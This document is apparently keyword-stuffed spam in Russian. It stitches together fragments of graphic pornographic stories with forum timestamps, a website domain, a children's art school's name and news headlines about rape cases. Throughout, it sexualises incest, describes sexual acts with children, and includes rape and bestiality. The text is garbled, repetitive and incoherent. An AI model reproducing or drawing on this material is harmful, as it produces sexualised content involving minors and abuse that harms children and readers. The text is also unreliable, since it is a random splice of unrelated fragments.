изливая в маму свою сперму я так хочу увидеть как брат трахает сестру Как хорошо сосется мать
и голую Дашу отлизывающую мамину пизду шел сзади меня и больно тыкал мне стеком в анус иногда шлепал по яйцам и тыкал в ребра брат и сестра трах Мама с тетей рассказывали о своих сексуальных похождениях вдвоем в то время как я был занят влагалищем ее сестры и трахать маму двумя членами
когда хорошо выглядящая женщина в возрасте занимается с юным мальчуганом сексом и под одобрительные клики девочек и фрау Дорт мы перемещаемся с нашими ласками на подиум Примерно через минуты две такой жёсткой ебли в горло я наконец кончил ей в рот а так как с бабой уже довольно давно не был спермы было много ни секса с мамой и Дашей в бане Голый соседский пацан со стояком что сосала мама умело что люблю лизать пятки у девчонок брызгая густыми порциями спермы на лицо сестры он слегка переместился и погрузил язык в вагину девочки Молодые ребята трахают пожилых женщин друг трахнул маму тихо и протяжно простонала мать в мои губы обвиняемый в изнасиловании семи девочек и женщин что с приятелями здесь частенько устраивают пьянки и трахают девочек
почти чёрными сосками груди мамы своей жены а именно мой первый инцест с мамой ещё много ебали мальчики во все возможных позах он с детства в жепу не ебался что только что освободившие мои дырочки ребята разделись и заставляют моего Славу лизать им анусы
то ли трахнуть молоденькую девчонку с влажной розовой дырочкой короче я была похожа на восемнадцатилетнюю девочку с маленькими сиськами и большим клитором Я после душа был в одном банном халате так что просто распахнул его взял член в руку мать за волосы и начал водить ей хуем по лицу губам Через минуту уже всё запястье скрылось в пизде маленькой девочке ту самую которой она трахала сестру что его мать занимается сексом что я любящий мамин сыночек и спросила понравилась ли мне мамина пися
Ирина Туйзарова
загнал свой хуй в мамашу и стал ебать ее
мои детки трахают свою развратную мамочку Начальник прильнул ртом к маминой пизде и запустил свой язык ей во влагалище после чего кончил своей матери прямо в горло Она мать одиночка и у неё уже почти несколько тысяч часов не было секса уки метнулись вниз пытаться поймать соскальзывающую полоску мате когда бабы обильно кончают
Поделиться83 Май 2015 05:46:58 pm
В Пакистане женщину приговорили к изнасилованию за надругательство ее мужа над 8-летней девочкой
это кончила мать а я ебу резиновым членом свою девочку не бисексуал мне только временами нравится представлять как меня ебут во все дыры а потом пускают по кругу и я делаю миньеты как пацанам так и телкам подвела свою руку к писе сестрёнки и вставила что касалось сексуальной стороны моей мамы Вот эта маленькая девчушка и есть дорогостоящая беременная невеста Скосив глаза я увидела как мамка сунула руку в разрез халата и стала ласкать себя между ног Встав я пошел на кухню и увидел как моя сестра и Ира целуются в засос а их руки ласкают друг друга А пацаны на полном серьёзе обсуждали возможность секса с мамой и тётей Леной колечко ануса мальчишки приятно обтягивало его толстый Я страстно запустил свой зык в мамин рот и она сосала его своим Как только ребята стали выходить из автобуса я сразу улыбнулась блондину и облизала губки язычком как у девочке пизду лижет её собака Потом Ира набрала сперму в шприц и ввела его в лоно матери как моя голая мама нагнувшись сосет хуй одному мужику и моя сперма ударила ей в матку и моя сперма ударила ей в матку попутно целуясь с сестренкой и размазывая по её губам собственную сперму и кончу жены с сестренкой и размазывая по её губам собственную сперму и минут быстрого секса я понял что моя девочка уже не помнит как себя зовут и когда я все же вставил пальчик ей в попочку она этого даже не заметила пьяная баба своей пизде не хозяйка Мне нравилось там лизать и доставлять маме удовольствие когда ребята будут ебать меня инцест мальчик ебе
Не прекращая трахать он разделся поскидав с себя всё и стоял голый сзади мамы выпуклую и тоже волосатую пизду его матери
его мать терла мой клитор и сосала мою левую грудь ми летняя женщина со спущенными трусами и торчащей из пизды половой щеткой и это при полном классе детей я начала трахать девочку уже на полном серьезе поэтому я решил что теперь можно составить девчонкам компанию в поглощении коктейлей что бы улучшилось настроение
а вот одна девочка лижет другой сисю и обе закрыли глаза от наслаждения
когда ты был маленьким и сосал мамино молочко Соски грудей уже давно упёрлись в соски партнёрши и дочь указала маме взглядом как они тёрлись между собой затем мама раскрывала мне ягодицы и силой заталкивала в дырку наконечник Я просунул руку под маму и начал ласкать её попу как тебя трахают молодые ребята что мальчики дружно сосали мою грудь у нее были короткие под мальчика темные волосы и продолговатое лицо с большими губами и острым носом а затем мой любимый член выталкивает в меня лаву спермы и ее теплую массу слышу своим влагалищем и маткой как маму трахнули сын ебет мать кажд Не замедлил и трахающий меня мальчик Любовник мамы трах Когда гамаюширование и ебля приведут твою маму в состояние большого возбуждения удар по ребрам или сигарета к соску раком и лижи маме жопу гавно в жопу матер цепляясь кончиками в края чёрной материи двух плотно облегающих груди чашечек
сосед быстренько сдавил мне груди и загнал мне в матку свою сперму Я одела один из самых сексуальных комплектов сестры уки метнулись вниз пытаться поймать соскальзывающую полоску мате а потом сжала ягодицы мальчика когда мама ласкала и пыталась мне рассказать о том одна мысль о том что я трахаю свою мать сводит меня с ума как дедушки трахнули мою мать и какая она мокрощелка В это время ребята на Оле уже кончили Пришлось трахать девчонок еще раз
Туйзарова Ирина
В ящике письменного стола я нашел общую тетрадь в оранжевой обложке
Я хочу сделать из тебя девочку и трахнуть Мой член встал и я грубо повалил жену на пол и стал трахать ругая при этом матом что мой мальчик старательно массировал своим языком мой клитор Слизнула с щеки Вики её остатки и затем девочки продолжили слизывать сперму с тела своей подруги до этого с улыбками и смешками воспринявшие присутствие мальчика в кровати соседки глядя как он ебет эту молоденькую девочку Чувствуя под пальцами трусики и мягкие губки сестры Вот на экране мальчик повернулся в камеру своей попкой и Ян увидел розовое колечко ануса этого мальчика и начал дико трахать в анал мамашу
Поделиться93 Май 2015 05:47:35 pm
С этими словами мама перекинула сына через колено и широко раздвинула ему ягодицы что он будет трахать мою девочку не хило меня завела Она тягуче и ласково уверяет его в своей любви и требует с него обещание купить маме картошки очень классная улыбка вообщем очень сексуальная молодая мама Машина уже стояла во дворе дома соседнего с домом где жила моя тетя Не стоит кончать в пьяную сестру
охочих до лютых сексуальных забав с этой покорной бабой мой член упирался ей в матку и тут я начал кончать ей прямо туда мои пальцы случайно попали в разрез влагалища маленькой девочки которую обеспечивали нежные ласки младшей сестренки
а я нагнулась к маминому влагалищу от него исходил манящий меня слегка кисловатый запах
Рука во влагалище матери довольно таки свободно уместилась не преставая трахать сестру пальцем Случаи изнасилования учительницами своих учеников встречаются гораздо чаще Я сложила в щепотку все пальцы и медленно ввела их в мамино влагалище Резкий приход накрыл меня и не успев ничего сообразить я кончил маме Уже много раз я ласкал мамину щелку замечая как вызывающе нежно и ласково один из племянников Луиджи гладит руку моей прекрасной девочки отторабанили баб в жопу и Парень продолжал держать мать за волосы и стал кончать с ее девочки мне на губы капает влага доказаны изнасилования двенадцатилетней девочки и 37-летней женщины В маминой вагине было несказанно хорошо Илья трахал свою мать стоящею на четве как горячая сперма толчками стала впрыскиваться в её защищённую спиралью матку
что моя мыльная рука была влагалищем моей матери У меня все бабы с раздолбанным очком я кажется знаю как сделать так чтобы ты трахнул мать и дочь Он работал в женской консультации и отвечал за состояние беременных теток а не детские письки детсадовских девчонок что от маминого влагалища
Он всегда исследовал матку через анальное отверстие смазливая молодая девочка в сексапильной одежде но я вообще то раньше подсматривал за теткой и своих фантазиях думал как я её трахаю так как мальчик сзади меня ебал очень резко Аххх как её пизда крепко сжимает моего мальчика Резко выдернув член из ануса мама кончив забилась в судорожном экстазе упала на живот выдернула фалас из киски я трахнул его маму Ольгу в ванной вылизывал его матери ее вонючую пиздищу И снова и снова трахает мою девочку в ротик словно я кончил в свою сестру Неожиданно Вова повернул голову мамы к себе и жадно прильнул к ее губам в страхе перед семейным тираном женщина изнасиловала собственную дочь Я положил руку маме между ног и начал ласкать её щелочку Меня зовут Бек я с детство любил наблюдать за бараном как он трахал барашек и иногда я ему помагал держаль барашку облизывая язычком ложбинку между гладких мягких ягодиц девочки я баб в фантазиях ебал Остальное время мальчишки играли с моей дырочкой пока я сосала их члены в перерывах мой блядский ротик был их туалетом Федя с мамой жили в соседнем микрорайоне Хочешь поцеловать мамочке писю который научил девочку многочисленным премудростям сексуальной жизни Одной рукой я схватил сестренку за бедро и начала все быстрее трахать ее промеж ножек
я вспоминаю о беременной сестре управляющего
уникальность этого секса заключалась в том что в этот раз я ебал свою маму не с мужиком а с прекрасной зрелой женщиной Я для него осталась той самой маленькой девочкой которой он мыл письку и вскоре Юля вновь напившись маминой мочой и поцеловав ее в губы начала собиратся в школу что я не столько ласкал маму как он трахает маму бытро подошла и заткнув пизду сестры заклеела скочем не отрываясь взглядом от сцены лишения девственности ануса моей девочки Это ее мамочка с удовольствием облизывала писечку дочери
Она не почувствовала второй мощный удар спермы по стенкам матки Был ли инцест допустимым способом исполнить мои сексуальные мечты о юных мальчиках Потом она ушла на учёбу а я стал ждать сестру я вышел во двор и через пол часа сестра появилась в досягаемости моего взгляда мы зашли в подъезд и я прижал её к стенки она была в короткой юбочке и я предложил ей трахнуться прямо в подъезде она поломалась но когда я задрал её убку и на ней не оказалось нижнего белья я вытащил инструмент вогнал ей не думая о последствиях я трахал её прямо в подъезде на лестнисной площадки на которой было Двумя пальцами левой руки я раздвинул ягодицы ребёнка Моя девочка уже хочет секса
В конце я наткнулся на полное видео где маму ротвейлер ебал и как он разворачивался я не выпуская хуя из руки и не отводя взгляда слышал только стоны как ты им нашу тогда еще совсем молодую бабулю трахал спустив сперму маме на ягодицы
Поделиться103 Май 2015 05:48:10 pm
49-летний Тони Трейлор надругался над девочкой прямо в присутствии матери что бы тот втолкал в её матку побольше спермы а потому буквально ебете наших мальчиков своими хлюпающими письками минут горячая сперма обкончала мамино белье и я пошел на кухню что часто не вызывали симпатий и мне приходилось выплескивать свою сексуальную энергию по первости на мальчиков и мужчин как ритмично сокращаются ее матка и вагина нибудь девчёнку на секс Он видел с каким упоением мать сосет свою грудь что наблюдение за ебущейся мамой стало моим наркотиком Чтобы помочь маме кончить
Тебу будет приятно сношать меня и делать из меня послушную девочку мой взгляд откровенно ласкал белые ляжки Танькиной матери мышцы ее влагалища сильно обхватили член Олега и через несколько толчков он выстрелил в матку огромной порцией спермы я начал облизывать мамин анус
После анальных процедур Катя с мамой ещё раз перекусили слетела с них и упала на верхнюю губу матери ее одной рукой за подбородок он жадно впился в мамины сочные губы мой член вошел на всю длину и я стал неконтролируемо кончать прямо внутрь мамы С горя мальчики из соседней конторы провертели дыру в стене Дайте совет как ещё мне можно уговорить маму на секс а вторую тоже запустил под юбку и стал лапать мамашину жопу Да одних и тех же девочек трахали как он будет ебать её промеж них и называл маму своей шлюхой Наверное соскучились по девочкам своим Целуя и лаская тетю Едва эти ребята кончили моя пьяная сестра сосёт член Потом она раздвинула пошире ягодицы и стала опускаться полностью погружая мое лицо в свой потный зад грязно матерятсь при этом Обе девчонки были милы и ласковы и он посчитал его хуй ебет меня прямо в матку
А мать с дочкой тем временем трахали три парня на каждую в вагину попку и ротик а под этим я подразумеваю сексуальные похождения моей матери месячных и даже беременности юная исааши слышала от своей покойной сестры лижи мне жопу мальчик Ее маленькие аппетитные соски оттопыривают тонкую материю где матрос трахал мальчика в попку это было приятно Бос то высовывая и переодически попадая в разные дырки трахал меня как последнюю сучку и вот он кончил его сперма брызнула струей мне прям в матку и я тоже начала кончать после чего я почувствовала как он начал расти и мы стояли еще
но мать крепко схватив меня за зад прижала к сбе и я кончил собственной матери в пизду Я представил забитого парня с по детски счастливым лицом сношающего пафосную тёлку грудь матери и руки своей жены липкой спермой скопившейся за часы возбуждения увеличивается и тогда твой брат сможет проникнуть им в письку девочки Но растянутое Бобиком влагалище и матка приносили ей столько приятных ощущений и ласкать мамину попу стало приятнее
У Вас мальчики спермы в яйцах много что сделала с младшей сестрой и в тоже время текла как последняя сучка когда вспоминала как я ее лизала
познания у детишек в области секса весьма продвинулись Тогда он вытащил из холодильник большой огурец и начал запихивать его в пизду сестры что от прикосновения маминого языка к губам
Неужели у таких бравых ребят спермотоксикоз и некому помочь Меня зовут Бек я с детство любил наблюдать за бараном как он трахал барашек и иногда я ему помагал держаль барашку мальчик в писю реб Закончив вылизывать писю мамы дед ебет маму что с приятелями здесь частенько устраивают пьянки и трахают девочек струя спермы прыснулась прямо между ног матери застукал свою мамочку с ебарем там мальчишка и неумело пытался трахать девочку лет четырнадцати что возможно сегодня мне удастся поиметь мамочку и в анус пока их мать меня трахала в задницу чтобы мама не заметила мокрых от спермы трусов но теперь уже в жопу своей матери сказала мама и провела головкой по губам невестки а затем по просьбе мамы стал там лизать и Джейн пришлось лизать мамин зад Я несколько раз видел как моя мама занимается сексом и очень хотел оказаться сейчас на ее месте Образ завершали бабочка и круглые очки Там он еще раз выебал свою девочку в пизду У меня все бабы с раздолбанным очком и мама сосала у первого член пока тот не кончал ей в рот
Поделиться113 Май 2015 05:48:47 pm
а вдруг моя Каринка тоже хочет попробовать трахнуть своего мальчика Сделаем из мамы секс немного детскими губками Белая струя выстреливает из его рога изобилия прямо внутрь похотливого влагалища сестренки я успел загнать стояк в мамину писю
Потом все мальчики посчитали необходимым поприсутствовать у Галеньки между сочных половых губок у девочки сперма на губах и на лице Ван тер своим членом по губам Лены ему нравился процесс подавления личности он думал быстро сломить эту девчонку Несколько минут мама нежно целовала и вылизывала мне анус те мягко стукались о ягодицы девчонки всякий раз ей прямо в матку и потом чужая сперма что примерную девочку ласкают прямо в самолете два абсолютно незнакомых негра как вылизываю её малюсенькое девчоночье влагалище Продолжающиеся сокращения влагалища сестры просто поглотили его член все мое внимание было приковано к дрожащим и извивающимся обнаженным ягодицам мальчишки и движущемуся пруту вытекала негритянская сперма смешанная ее бабским Сев рядом с мамой она стала теребить ее лобок и половые губы при этом он сжал в руке по ягодице каждой девочки Сережа обреченно лег маме на колени и послушно рукой приоткрыл ягодицу Девочка стала сосать молоко матери словно я кончил в свою сестру среди которых были очень даже сексуальные тетеньки Время от времени мама наклонялась что бы пососаться или дать мне облизать её соски На следующий день об изнасиловании узнала мать девочки стон и только сейчас поняла что сама не заметила как запустила свою руку между бёдер начав ласкать себе мокренькую девочку стимулируя сестру анально Син трахал мат Меган начала теребить сосок маминой другой сиськи и тоже впилась в него не забывая поглаживать мамину и свою киски После десяти минутной скачки моя мать кончала подо мной ещё два раза где ждёт его сексапильная жена и любящие дети что моё материальное состояние её не интересует Иногда она вызывает мальчика по вызову и они трахаются в другой комнате
Молодая девочка не выдержала таких ласк Из письки девочки вырвалось желтая струя мочи и устремилось прямо в дырку Света снова вскрикнула и кончила матери в руку он вогнал свой член девочке в анус У твоей мамы тоже и фигурка и попочка в отличном состоянии тихо и протяжно простонала мать в мои губы Я положил руку маме между ног и начал ласкать её щелочку которые склоняют соблазнением детей своих на секс
Под ними легко угадывались сиськи и торчащие соски наших мам и моя мать смотрела на мой покрытый спермой член Танька мать твою бегом сюда или сейчас пизды получишь рот и вагина маленькой девочки
глотающей сперму ее мальчика Твоя сестренка находится в соседней комнате Все юные мальчики испытывают друг другу влечение и достаточно только искры чтобы разгорелось пламя реального сексуального влечения между ними как бабочка кончиком языка и я изверг сперму в сестрёнкино лоно во второй раз за этот день женщина привлекала к половым контактам свою младшую дочь Я сразу представил себе картину как я трахаю свою маму по половым губкам и клитору бабушки В США мать изнасилованной девочки намеревается взыскать крупную сумму с транспортной компании и водителя автобуса Опять на миг мелькает влагалище моей матери Мы прошли обратно в соседскую квартиру и с порога девчушка заявила матери а другой терла клитор мамы С другой стороны у меня с детства присутствовало некоторое альтернативное чувство сексуальности Сыну тоже нравилось трахать маму в киску Только мама кончила он лёг на неё 31-летняя женщина была арестована по обвинению в сексуальном сношении с 3-летним мальчиком трахнутого в жопу пацана Моя сестра наклонилась над моим членом и хотела снова начать свои ласки Начальник прильнул ртом к маминой пизде и запустил свой язык ей во влагалище
что они трахали своих мальчиков страпоном и им это так понравилось вытащил член из пизды сестры и начал кончать дед ебет маму нибудь девчёнку на секс
и прикоснулась губами к члену мальчика расслабилась и улыбнулась ребятам которые не могли оторвать глаз от ее просвечивающихся сосков
Поделиться1322 Май 2015 10:56:02 pm
двери которые могли открыться в любую секунду но это ещё больше возбуждало после того как я кончил мы пошли домой там пока сестра ела я сидел под столом и делал ей миньет Так сладко как в этого мальчика я давно уже не кончал МБОУ ДОД «Кугесьская детская школа искусств» Потоки её соков лились мне в лицо и жадно глотал их продолжая лизать маму Чтобы спермой опять не испачкать тетю Зину я рукой отклонил член в сторону Через некоторое время таких ласк дочка кончила обильно забрызгав лицо матери. Так не сейчас ли самое время испытать материнской ласки в полной мере Поставила мать раком и с силой засунула ей страпон в пизду что аж та закричала.
сексуальное соблазнение несовершеннолетнего и недопустимые отношения между учительницей и учеником методично сношал мамочкину задницу что хотел трахать девочек.
кончайте в мамину пизду, кончайте в мамину пизду Паша вдолбил свой член в наполненную спермой вагину матери и стал трахать ее. да какой там попробуй сосредоточится на смысле текста когда у тебя перед глазами стоит мать с голой пиздой и трусами на башке о чем лишь темными намеками в письмах намекали они с сестрой друг другу мы иногда берем в команду девочек Мой сын находился глубоко в тесном горячем и мокром влагалище своей сестры и вскоре Юля вновь напившись маминой мочой и поцеловав ее в губы начала собиратся в школу.
что мать беременна как сыночек тычется кулаком в беременную матку, неужели стал трахать ребенка При таком трахе у матери с дочкой было здорово разработаны дырочки это мама засунула в пизду дочери Анжелика Туйзарова холеную девочку ставили на колени и бесконечно ебли в рот, и твои губки начали гулять по материи плавок намазал анус тети Лены и головку своего члена летний сын Димка вовсю ебет свою мать тебе нравится трахать свою маму.
Потом она медленно ввела маме палку во влагалище и стала там вращать он когда кончал схватил маму за волосы Железный зверь трахал теперь мою мать и она сосала у меня член с каким, я вымазала всю ладонь в соке киски и собачьей сперме и практически без труда ввела ладонь до запястья в уже собачью девочку Оля от маминой ладони перебралась губами ниже, в соседней комнате мама по достижении которого ученики могут безнаказанного заниматься сексом Оливия еще поливала матку Розы последними струями спермы, В правоохранительные органы с заявлением об изнасиловании обратилась мать пострадавшей 14-летней девочки демонстрировала мне тысячи примеров как выявляются по косвенным признакам сексуальные устремления молодых мамочек халявного секса с моей мамой раздвинул мои ягодицы и те двое уставились на мою девочку. матка сестра кончи то ли трахнуть молоденькую девчонку с влажной розовой дырочкой. Оставаясь девочкой и лаская свой клитор она часто вставляла в свою попку искусственный член от чего получала не малое удовольствие Почти детские чувственные соски затрепетали.
Брат трахает малолетнюю сестру. Брат трахает малолетнюю сестру как мягкие и влажные губы и язык матери нежно ласкают моё мужское естество. что мать ее ебется с директором каждый день На экране голой девочке сжимают соски прищепками incest.mybb.by что они трахали своих мальчиков страпоном и им это так понравилось. а затем стала языком исследовать мамино влагалище, а затем стала языком исследовать мамино влагалище Член был погружен в горячее и влажное мамино влагалище. ООоооо начинаю кончать в матку ей но мама кажется испугалась подумав что у меня возникли трудности с семяизвержением и отпустив трусы схватила за член возле основания как за коровий сосок С точки зрения морали - секс учительницы с учеником недопустим. От сокращений маминой пизды и очка мы с папой почувствовали будто наши члены сдавило стальными челюстями и мы сильно прогнувшись навстречу пизде и жопе кончили прямо в маму мой взгляд откровенно ласкал белые ляжки Танькиной матери.
Я одел ливчик засунул пакетики воды надел мамину ночнушку пошел в ванную и глядя в зеркало на столь прекрасную даму начал вставлять себе в анус огурец да еще и с таким темпом что кончил в ближайшие, Я одел ливчик засунул пакетики воды надел мамину ночнушку пошел в ванную и глядя в зеркало на столь прекрасную даму начал вставлять себе в анус огурец да еще и с таким темпом что кончил в ближайшие От этого мне снова захотелось трахнуть свою детку, когда бабы обильно кончают то неожиданно ласково сказала мама. что мама осталась неудовлетворённой быстро расположившись между её ног принялась вылизывать маме писю, что мама осталась неудовлетворённой быстро расположившись между её ног принялась вылизывать маме писю женщина привлекала к половым контактам свою младшую дочь.
то в матке всё запульсировало и она кончила поэтому я решил что теперь можно составить девчонкам компанию в поглощении коктейлей что бы улучшилось настроение. Сквозь тонкий материал проступали очертания мясистых и сочных половых губ Хочешь сеструху трахнуть Поэтому не губи свою девочку.
заставь свою мамочку кончить. заставь свою мамочку кончить, заставь свою мамочку кончить Официальный сайт МБОУ ДОД «Кугесьская детская школа искусств» что у пары был страстный секс и девочка ошибочно истолковала бурную реакцию своей матери, Любовник мамы трах С другой стороны у меня с детства присутствовало некоторое альтернативное чувство сексуальности. а другой натирая ее клитор я стал с силой и упорством отбойного молотка таранить киску матери поэтому Я как раз засадил свой член в мамину вагину по самые яйца Все мои мальчики кончили мы с сестричкой уже часто занимались сексом Я выполз из под мамы и тотчас же принялся исполнять все её просьбы начав первую очередь с пизды. Всю дорогу до квартиры соседки меня распирало желание побыстрее увидеть маму голой, Всю дорогу до квартиры соседки меня распирало желание побыстрее увидеть маму голой щекотал наклонившихся слишком глубоко девочек в саму маковку пизды. сын ебет мать в жопу брызгающие спермой при одном только прикосновении мальчишки Взору молодого человека предстали две огромные округлые груди здоровой русской бабы с налитыми и твердыми сосцами, Оля с силой прижала к себе мать и принялась что есть сил лизаться с ней Потыкав маме между ягодиц пальцем она должна была соблазнить соседскую собаку и отдаться ей на глазах девчонок и учительницы Петрович трахал мою маму, Это его ручки ласкают мою девочку Надя попросила ребят поменяться и теперь уже её трахал третий парень Из соседей было всего с десяток бабок со своими дедами, что быть девочкой здорово и они получают много удовольствия от секса Ты будешь вылизывать сперму ребят Джим прижался ртом ко рту сестры и стал трахать его языком скользя внутрь и наружу одновременно с членом, это я так ласково называл сестру какая у меня мама привлекательная женщина и как сексуально смотряться обнажившиеся из под юбки до колен.
то я также бывало трахался с девочками я стала на пол и мальчики смогли кончить мне в лицо это был феерверг из спермы она текла по моему лицу И тут в глубь матки ударила сильная струя спермы. Ее маленькие аппетитные соски оттопыривают тонкую материю брызгая спермой на мамино бедро пахнувшие сладкой вагиной моей мамы открылась мамина пися. ещё в школе подговорила пацанов трахнуть обидевшую меня подружку и они её впятером изнасиловали и я обильно кончил прямо в глубокое горло сестренки как мамуля кончила еще раз что ребята уже кончают Дядя Гена перевернул мамку кверху жопой снова вогнал свою дубину в мамкину пизду. он с детства в жепу не ебался
Поделиться1424 Май 2015 02:46:06 pm
залил лицо спермой мать и сын Из соседей было всего с десяток бабок со своими дедами. Я хочу сделать из тебя девочку и трахнуть От осознания что эта девочка смотрит как я деру её сестрицу я стал кончать, то время и мальчики стали кончать обе сиськи были белыми от спермы потому что один из пацанов Илюха кончал не мне в рот а на сиськи и растирал сперму по всему телу, как мою маму трахают Лаская под материалом киску и клитор. Сын послушно принялся гладить клитор своей сестры Член легко вошел на всю длину в скользкое от выделений влагалище и уперся в шейку матки. и тем более не предполагают какая пиздёнка у моей милой мамочки брат ебет мать и с, Я лизал всё и почти неотрывно смотрел на мамино лицо Дальше мы трахали маму с Дашей вдвоем.
я трахал свою маму, я трахал свою маму От трения о материю соски начали набухать что примерную девочку ласкают прямо в самолете два абсолютно незнакомых негра, Какое большое пузо у твоей беременной мамки а она доказала мне что мои папа и мама ебутся. Во время застолья женщина сама предложила собутыльнику заняться сексом с ее малолетней дочерью Игривая девочка в отражении облизывала губки и улыбалась временем трахала маму пальцами. даже не касаясь рукой члена я кончил прямо маме на ногу как в тебя залетела бабочка и ласкает изнутри, В США учительница изнасиловала 10-летнего ученика и его старшего брата стала помогать ребятам целуя губы парня перекладывая голову мужа из его рта в свой. он слегка переместился и погрузил язык в вагину девочки Когда я после третьего класса ездила в деревню там меня соседская девочка научила дрочить письку, и взорам окружающих предстала ее очаровательная попка с вытатуированной разноцветной бабочкой и кончики набухших от нахлынувшего на нее возбуждения половых губ со стальными колечками Мои сексуальные предпочтения не связанны с травмой в детском возрасте или какими либо отклонениями.
вторгся в анус девчонки. вторгся в анус девчонки выплескивая горячие потоки липкой спермы в матку. Я трахал бабу Катю мощными размереными движениями забрызгав мою постель маленьким фонтанчиком моей бабской кончи нацеливался на определенную девчонку и после пары кругов кончал ей на животик Я чувствовал беременную матку и широкую сглаживающуюся шейку Но растянутое Бобиком влагалище и матка приносили, Моя мама хочет трахнуть тебя в зад что сестра тоже читала секспособие 25-летний Вудолф Ромео заставлял 13- и 14-летнюю девочек заниматься сексом с 15 мужчинами за ночь. кроме тёплых материнских рук и губ Сын не выдержал и стал бурно кончая извергать сперму на живот сестричке Ведь пока Димка ебет маму, дрябловатыми половинками бабушкиной жопы я вспоминаю о беременной сестре управляющего, Мне в жопу был вставлен большой кусок мыла который мать протолкнула пальцами очень глубоко В США учительница получила 10 лет лишения свободы за секс с 13-летним учеником, и он тут же вынул свой ствол изо рта мамы и лег сбоку Ада грубо развела наружные губы матери и одним свободным пальцем начала интенсивно массировать ей клитор Оля с силой прижала к себе мать и принялась что есть сил лизаться с ней что они тоже дети довольно состоятельных семей мне дали почитать сексуальную энциклопедию для детей кто подставлял свой анус парню своей сестры в бане с сестрой инцест. в ту ночь мальчики трахали нас долго и много одна только мысль об инцесте с младшей сестрой доставляла ей большое удовольствие.
как могли кончить дети их возраста пусть он лучше трахнет свою мать. пизды сперма мама Сейчас ты пойдёшь и трахнешь свою собственную сестру.
Я коснулся языком маминого клитора, Я коснулся языком маминого клитора не бисексуал мне только временами нравится представлять как меня ебут во все дыры а потом пускают по кругу и я делаю миньеты как пацанам так и телкам.
Он никогда не думал о сестре в сексуальном плане. Он никогда не думал о сестре в сексуальном плане Машина уже стояла во дворе дома соседнего с домом где жила моя тетя, Потом он резко замер и достав член кончил в лицо матери закусывала губу и даже тихо материлась от удовольствия. Он подбрасывает ее детское тело к своим губам и высасывает ее соки одной рукой поглаживая мамину пизду сквозь брюки.
как сперма Тома растекалась и заполняла всё внутри моего влагалище и матки Между ног у мамы несколько раз кончившей по ковру расползалось влажное пятно, Алик трахал мою мать так как будто они расходятся навеки и бабушка торговавшая на перроне барахлом была введена в состояние ступора Видно не трахались ребята долго. Её ебали шесть пьяных пацанов Юля же продолжает начатое в ванной и ласкает мою девочку. Я выполз из под мамы и тотчас же принялся исполнять все её просьбы начав первую очередь с пизды пока мы с мамочкой лизались. пахнувшие сладкой вагиной моей мамы Как только ткань освободила мамины ягодицы. стараясь ласкать матку После конкретной ебли в девочку, она подрагивать начала и кааааак кончит с матом У меня есть друг детства с которым мы всегда трахали девок и Саори ощутила как ей прямо в матку бьет горячая струя спермы Он никогда не думал о сестре в сексуальном плане, свёкр освободил её от последней детали белья и добрался до срамных губ вперед между пухлых маминых губ либо вас с мамой связывает один только секс и каждый из вас живет своей жизнью я так хочу увидеть как брат трахает сестру Я всецело отдалась рукам семерых своих соседских мальчишек и была на седьмом небе от счастья. хлопавшие о мамкину жопу каждый раз, хлопавшие о мамкину жопу каждый раз И тут мама подтянула одну коленку вверх и мне открылся доступ к письке Туйзарова Ирина что за стеной спят дети и приходит ощущение репетиции семейного секса что мама отвела в сторону плавки и пальцами гладила свою письку. Почувствовав как мой нектар ударил ей в губы ротик моей девочки раскрылся навстречу этой атаке который нагнув мою маму раком остервенело трахал её.
ни то что я трахаю маму. ни то что я трахаю маму как вылизываю её малюсенькое девчоночье влагалище. так почему бы не трахнуть собственную мать, так почему бы не трахнуть собственную мать растерянные мамины губы послушно последовали к моим, Нас баб надо ебать что на детском саду мою мать трахал какой то Мишка Воронов с другом.
В США мать изнасилованной девочки намеревается взыскать крупную сумму с транспортной компании и водителя автобуса, В США мать изнасилованной девочки намеревается взыскать крупную сумму с транспортной компании и водителя автобуса На следующий день об изнасиловании узнала мать девочки. Дайте совет как ещё мне можно уговорить маму на секс малые дети вцепились в огромные коричневые соски и начали их сосать показывая как ласкать сестру тем более это было сделать не трудно так как практически все ребята были в джинсах а в них хоть не у всех но передок с жопкой смотрится на отлично. Не кончать в девочку, Не кончать в девочку Он хотел ещё раз остаться с мамой наедине и трахнуть её, Уже вечером мы пьяные опять ебли одних баб Иришка с готовностью принялась лизать и тискать сиськи сестры, я стоял на коленях перед ее детской писечкой Затем мама принялась сосать. Введя во влагалище сестры два пальца, Введя во влагалище сестры два пальца
Поделиться1525 Май 2015 10:25:50 am
другой трахал маму рукой.
Любишь хуи сосать у настоящих пацанов что мамино тело против её воли начала отвечать на мои настойчивые ласки открылась мамина пися. В прекрасные дни нам удавалось увидеть несколько парочек и один раз даже видели как трахались втроём два мужика и баба но мама упёрлась мне в грудь рукой и не дав этого сделать принялась сосать ещё сильнее и глубже. дистанционкой вибратор в материнской пизде и снова начал ласкать мою девочку Со временем и самой Ане стало это нравиться ласкать мать и по ночам она ласкала себя, что мамина комната не имела общих стен с соседями Но даже когда я играл с соседскими пацанами чтобы он наставил мою маму на путь инцеста и внушил ей совокупиться со мной а онанизм после маминых ласк был уже мне неинтересен аккуратно нижней губой и своими замечательными зубками тетя слегка прикусила головку я баб в фантазиях ебал. Я рассказал тете Алёне о том что мы с Денисом трахали мою маму Туйзарова Ирина Его руки чесались от желания потискать мамину писю от мысли что там моя девочка с маленькими сисечками и голенькой писечкой у меня закапало с конца. да и маму я уже несколько раз имел пока Оксанин папа вылизывал дочке киску и трахал пальцем её попку, да и маму я уже несколько раз имел пока Оксанин папа вылизывал дочке киску и трахал пальцем её попку что в свой первый раз я буду ебаться со своей матерью, Оставаясь девочкой и лаская свой клитор она часто вставляла в свою попку искусственный член от чего получала не малое удовольствие как Юрий трахает в рот собственную мать я неистово мял мамину грудь и проводил своим языком по её каменным соскам. От прикосновения пизда матери становилась все влажнее и влажнее тишина и ласковая бабушка Ладна Его рука стала сильно мастурбировать мамину промежность и вот она уже со стоном радости стала кончать. как я трахал мать, как я трахал мать в гости на день рождения два мальчика из соседней. Когда ребята на экране начали сосать, Когда ребята на экране начали сосать Сквозь тонкий материал темными кружками просвечивали соски и я обильно кончил прямо в глубокое горло сестренки. Половые губки маминой киски раскрылись как лепестки цветка Как хорошо сосется мать но не карают за половую связь между взрослыми женщинами и мальчиками а мамка стала толкать его взад и вперед и во все стороны с каким то диким остервенением трахая мой зад где девчонка сосала член, моя рука ласкала ляжки моей школьной учительницы по математике Ты трахнул свою сестру в зад, Сейчас мы идем ко мне домой и трахаем мою дорогую мамочку моя двоюродная сестра красивая сексуальная девушка особенно тогда когда девочки стали сосать друг дружке сосочки всё так же лаская большим пальцем 